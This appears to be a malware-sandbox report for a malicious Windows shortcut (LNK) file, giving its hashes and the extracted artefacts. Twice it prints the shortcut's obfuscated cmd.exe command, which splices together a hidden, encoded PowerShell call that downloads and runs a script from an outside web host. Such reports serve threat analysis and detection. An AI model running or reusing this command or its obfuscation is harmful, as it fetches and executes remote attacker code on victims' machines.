Malicious
Malicious

6454a14c3e6e92deb981e622b8afbd8a

LNK File
|
MD5: 6454a14c3e6e92deb981e622b8afbd8a
|
Size: 1.02 KB
|
application/x-ms-shortcut

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
6454a14c3e6e92deb981e622b8afbd8a
Sha1
363d746e87c67a81e3f8cd2c0bfb851e9ca87183
Sha256
1bdfcd1d33ff8a80eb5a687622f752b148065d158d2925003ad2d6cd458da261
Sha384
b7581296451498e0979ddc9cd07cec9bfc7b0240b2c48728ec83f06158f5d4de74c65490ee4532878c9d8896dab6c1ac
Sha512
797d15912b05d49a87a5825b988d7fe398504ae10d72a575174dfdb5924815ba0816cae4ce55f8ec63fde3ec13e14e22ad7840962eb349cde106744d9713d60e
SSDeep
24:8J8AyqvWiOrBOUn8MTXMT+7ZEebue3/JQnvnFHJph/S:8J8AyNiO92ven/JyvxJK
TLSH
B71110BF1790D8E1C26D52B20413F7B677883536C90803E9E000B0C2EAB02A4AF1DC38
File Structure
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /WMRX:F0E /WFXI:BNYE5S /D/C "for %C in (er) do for %q in (nc) do for %O in (-w) do for %b in (pow) do for %V in (-e) do for %K in (hid) do for %r in (shel) do for %P in (xe) do for %Z in (l.e) do for %Q in ("AaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAG8AcgB2AGUAdABlAG4AbwBwAG8AdABlAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBzAH") do for %d in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHI") do for %f in ("QAYQByAHQAdQBwAC8AOQAyADkANwBhADkAYgAyAGIAYwA4AGUANAA2ADYAMQA5ADUAYQBiAGUAYgA3ADQAMAAxADcAMgA2ADQAYQBiACcAKQA=") do %b%C%r%Z%P %O %K %V%q %~d%~Q%~f"

6454a14c3e6e92deb981e622b8afbd8a (1.02 KB)
File Structure
Characteristics
No malware configuration were found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

cmd.exe /WMRX:F0E /WFXI:BNYE5S /D/C "for %C in (er) do for %q in (nc) do for %O in (-w) do for %b in (pow) do for %V in (-e) do for %K in (hid) do for %r in (shel) do for %P in (xe) do for %Z in (l.e) do for %Q in ("AaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAG8AcgB2AGUAdABlAG4AbwBwAG8AdABlAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBzAH") do for %d in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHI") do for %f in ("QAYQByAHQAdQBwAC8AOQAyADkANwBhADkAYgAyAGIAYwA4AGUANAA2ADYAMQA5ADUAYQBiAGUAYgA3ADQAMAAxADcAMgA2ADQAYQBiACcAKQA=") do %b%C%r%Z%P %O %K %V%q %~d%~Q%~f"

Malicious

6454a14c3e6e92deb981e622b8afbd8a

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙